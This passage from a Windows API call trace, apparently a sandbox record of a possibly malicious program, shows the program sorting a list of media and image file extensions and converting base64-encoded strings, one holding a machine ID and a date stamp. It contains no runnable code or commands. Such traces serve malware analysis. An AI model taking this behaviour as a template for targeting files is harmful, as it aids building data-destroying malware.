cchCount2=3) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".ram", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".ram", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".ram", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".ram", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".ram", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u", cchCount1=4, lpString2=".ram", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=4, lpString2=".ram", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mid", cchCount1=4, lpString2=".ram", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2", cchCount1=4, lpString2=".ram", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=4, lpString2=".ram", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pls", cchCount1=4, lpString2=".ram", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qcp", cchCount1=4, lpString2=".ram", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".au", cchCount1=3, lpString2=".rm", cchCount2=3) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ra", cchCount1=3, lpString2=".rm", cchCount2=3) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".sd2", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".sd2", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".sd2", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".sd2", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".sd2", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u", cchCount1=4, lpString2=".sd2", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=4, lpString2=".sd2", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mid", cchCount1=4, lpString2=".sd2", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2", cchCount1=4, lpString2=".sd2", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=4, lpString2=".sd2", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pls", cchCount1=4, lpString2=".sd2", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qcp", cchCount1=4, lpString2=".sd2", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ram", cchCount1=4, lpString2=".sd2", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".sid", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".sid", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".sid", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".sid", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".sid", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u", cchCount1=4, lpString2=".sid", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=4, lpString2=".sid", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mid", cchCount1=4, lpString2=".sid", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2", cchCount1=4, lpString2=".sid", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=4, lpString2=".sid", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pls", cchCount1=4, lpString2=".sid", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qcp", cchCount1=4, lpString2=".sid", cchCount2=4) returned 1 [0105.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ram", cchCount1=4, lpString2=".sid", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sd2", cchCount1=4, lpString2=".sid", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".snd", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".snd", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".snd", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".snd", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".snd", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u", cchCount1=4, lpString2=".snd", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=4, lpString2=".snd", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mid", cchCount1=4, lpString2=".snd", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2", cchCount1=4, lpString2=".snd", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=4, lpString2=".snd", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pls", cchCount1=4, lpString2=".snd", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qcp", cchCount1=4, lpString2=".snd", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ram", cchCount1=4, lpString2=".snd", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sd2", cchCount1=4, lpString2=".snd", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sid", cchCount1=4, lpString2=".snd", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".wav", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".wav", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".wav", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".wav", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".wav", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u", cchCount1=4, lpString2=".wav", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=4, lpString2=".wav", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mid", cchCount1=4, lpString2=".wav", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2", cchCount1=4, lpString2=".wav", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=4, lpString2=".wav", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pls", cchCount1=4, lpString2=".wav", cchCount2=4) returned 1 [0105.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qcp", cchCount1=4, lpString2=".wav", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ram", cchCount1=4, lpString2=".wav", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sd2", cchCount1=4, lpString2=".wav", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sid", cchCount1=4, lpString2=".wav", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".snd", cchCount1=4, lpString2=".wav", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".wax", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".wax", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".wax", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".wax", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".wax", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u", cchCount1=4, lpString2=".wax", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=4, lpString2=".wax", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mid", cchCount1=4, lpString2=".wax", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2", cchCount1=4, lpString2=".wax", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=4, lpString2=".wax", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pls", cchCount1=4, lpString2=".wax", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qcp", cchCount1=4, lpString2=".wax", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ram", cchCount1=4, lpString2=".wax", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sd2", cchCount1=4, lpString2=".wax", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sid", cchCount1=4, lpString2=".wax", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".snd", cchCount1=4, lpString2=".wax", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=4, lpString2=".wax", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mid", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pls", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qcp", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ram", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sd2", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sid", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".snd", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wax", cchCount1=4, lpString2=".wma", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 3 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mid", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 1 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 3 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 3 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pls", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 3 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qcp", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 3 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ram", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 3 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sd2", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 3 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sid", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 3 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".snd", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 3 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 3 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wax", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 3 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wma", cchCount1=4, lpString2=".mjf", cchCount2=4) returned 3 [0105.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".art", cchCount2=4) returned 1 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".art", cchCount2=4) returned 1 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mid", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pls", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qcp", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ram", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sd2", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sid", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".snd", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wax", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wma", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mjf", cchCount1=4, lpString2=".art", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 1 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 1 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mid", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pls", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qcp", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ram", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sd2", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".sid", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".snd", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wax", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wma", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mjf", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 3 [0105.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".art", cchCount1=4, lpString2=".bmp", cchCount2=4) returned 1 [0105.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".cdr", cchCount2=4) returned 3 [0105.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".cdr", cchCount2=4) returned 1 [0105.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".cdr", cchCount2=4) returned 1 [0105.134] GetCurrentThreadId () returned 0x1358 [0105.134] GetCurrentThreadId () returned 0x1358 [0105.134] GetCurrentThreadId () returned 0x1358 [0105.134] GetCurrentThreadId () returned 0x1358 [0105.134] GetCurrentThreadId () returned 0x1358 [0105.134] GetCurrentThreadId () returned 0x1358 [0105.134] GetCurrentThreadId () returned 0x1358 [0105.134] GetCurrentThreadId () returned 0x1358 [0105.134] GetCurrentThreadId () returned 0x1358 [0105.134] GetCurrentThreadId () returned 0x1358 [0105.134] GetCurrentThreadId () returned 0x1358 [0105.134] GetCurrentThreadId () returned 0x1358 [0105.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NkYwNTk0OUQyMzZGOUEyRTc3RTYwNjQ2M0Y3MUQzMDI4RUU5M0E0Qjc4QkY2M0Q3OEY4NDBBRDhENUNBNkM3RkREMDU4NEE5RkRCMzkyQzdEMTEwM0FDMTExOTYwREM2NEQ4QjMwRTM3QzUzQUU3MjU4MUMzREM4MURCRTk1MUQwNTVCRjlGODc0MTc5NzdGNzlDMjNEMzIyRTdFQUZGQjJDMUMyMjI4NEM0Qzg3QkY1QkJENjNENkY5MkYxRjg2NTUwREUyOTZCQjM0MkNGN0MxMjQzREIxMTNFMUUxRUYxREEwRTY4MjBCMURFMDZBRTZEOEQ1RDRBQTZEMkZEODRGNjVDQ0FFRkQ4RjlEMjhCMEZCMjkwN0I4QUI3NDJFNkE2NTcxNkM5ODNDMzU=", cchWideChar=404, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 404 [0105.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NkYwNTk0OUQyMzZGOUEyRTc3RTYwNjQ2M0Y3MUQzMDI4RUU5M0E0Qjc4QkY2M0Q3OEY4NDBBRDhENUNBNkM3RkREMDU4NEE5RkRCMzkyQzdEMTEwM0FDMTExOTYwREM2NEQ4QjMwRTM3QzUzQUU3MjU4MUMzREM4MURCRTk1MUQwNTVCRjlGODc0MTc5NzdGNzlDMjNEMzIyRTdFQUZGQjJDMUMyMjI4NEM0Qzg3QkY1QkJENjNENkY5MkYxRjg2NTUwREUyOTZCQjM0MkNGN0MxMjQzREIxMTNFMUUxRUYxREEwRTY4MjBCMURFMDZBRTZEOEQ1RDRBQTZEMkZEODRGNjVDQ0FFRkQ4RjlEMjhCMEZCMjkwN0I4QUI3NDJFNkE2NTcxNkM5ODNDMzU=", cchWideChar=404, lpMultiByteStr=0x240fe08, cbMultiByte=404, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NkYwNTk0OUQyMzZGOUEyRTc3RTYwNjQ2M0Y3MUQzMDI4RUU5M0E0Qjc4QkY2M0Q3OEY4NDBBRDhENUNBNkM3RkREMDU4NEE5RkRCMzkyQzdEMTEwM0FDMTExOTYwREM2NEQ4QjMwRTM3QzUzQUU3MjU4MUMzREM4MURCRTk1MUQwNTVCRjlGODc0MTc5NzdGNzlDMjNEMzIyRTdFQUZGQjJDMUMyMjI4NEM0Qzg3QkY1QkJENjNENkY5MkYxRjg2NTUwREUyOTZCQjM0MkNGN0MxMjQzREIxMTNFMUUxRUYxREEwRTY4MjBCMURFMDZBRTZEOEQ1RDRBQTZEMkZEODRGNjVDQ0FFRkQ4RjlEMjhCMEZCMjkwN0I4QUI3NDJFNkE2NTcxNkM5ODNDMzU=", lpUsedDefaultChar=0x0) returned 404 [0105.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TVpSSUQ5NkE4OTZFMzJFX19UYXJpaCgxNiBNYXJ0IDIwMjAgUGF6YXJ0ZXNpKV9fU2FhdCgxMS00MC01OSk=", cchWideChar=84, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 84 [0105.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TVpSSUQ5NkE4OTZFMzJFX19UYXJpaCgxNiBNYXJ0IDIwMjAgUGF6YXJ0ZXNpKV9fU2FhdCgxMS00MC01OSk=", cchWideChar=84, lpMultiByteStr=0x24ae4a8, cbMultiByte=84, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TVpSSUQ5NkE4OTZFMzJFX19UYXJpaCgxNiBNYXJ0IDIwMjAgUGF6YXJ0ZXNpKV9fU2FhdCgxMS00MC01OSk=\x01", lpUsedDefaultChar=0x0) returned 84 [0105.135] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fb10*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19fb10*=0) returned 0x0 [0105.136] 